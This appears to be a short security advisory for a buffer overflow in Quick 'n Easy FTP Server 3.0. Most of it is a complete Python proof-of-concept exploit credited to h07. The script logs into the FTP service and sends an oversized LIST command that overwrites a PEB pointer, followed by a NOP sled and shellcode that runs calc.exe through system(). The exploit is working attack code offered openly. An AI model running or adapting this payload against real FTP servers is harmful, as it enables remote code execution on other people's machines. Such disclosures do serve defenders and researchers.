|
|
|
|
| |
"Quick 'n Easy FTP Server is a multi threaded FTP server for Windows 98/NT/XP that can be easily setup even by inexperienced users. New users can be easily created by a wizard which is guiding you step by step in the process."
A buffer overlow vulnerability exists in Quick 'n Easy FTP Server. |
| |
Credit:
The information has been provided by h07.
|
| |
Vulnerable Systems:
* Quick 'n Easy FTP Server versions O.O
Exploit:
#!/usr/bin/python
#Quick 'n Easy FTP Server 3.0 (LIST) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Tested on 2000 SP0 polish
#Bug found by h07
#Date: 18.07.2006
from socket import *
host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
adr1 = 0x01ABED9A # ~Address of shellcode
adr2 = 0x7FFDF020 # RtlEnterCriticalSection pointer
shellcode = (
#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f
#reconstruction PEB block
#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer
#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value
#...
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)
"\xFF\xD1\xEB\xF7")
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("user %s\r\n" % (user))
print s.recv(1024)
s.send("pass %s\r\n" % (password))
print s.recv(1024)
buffer = "LIST "
buffer += "?"
buffer += "A" * 267
buffer += intel_order(adr1)
buffer += intel_order(adr2)
#EDX <-- adr2 (RtlEnterCriticalSection pointer)
#ECX <-- adr1 (address of shellcode)
#MOV DWORD PTR DS:[EDX],ECX (rewrite RtlEnterCriticalSection pointer)
#MOV DWORD PTR DS:[ECX+4],EDX (exception and jump to shellcode)
buffer += "\x90" * 300 + shellcode
buffer += "\r\n"
s.send(buffer)
print s.recv(1024)
s.close()
|
|
|
|
|
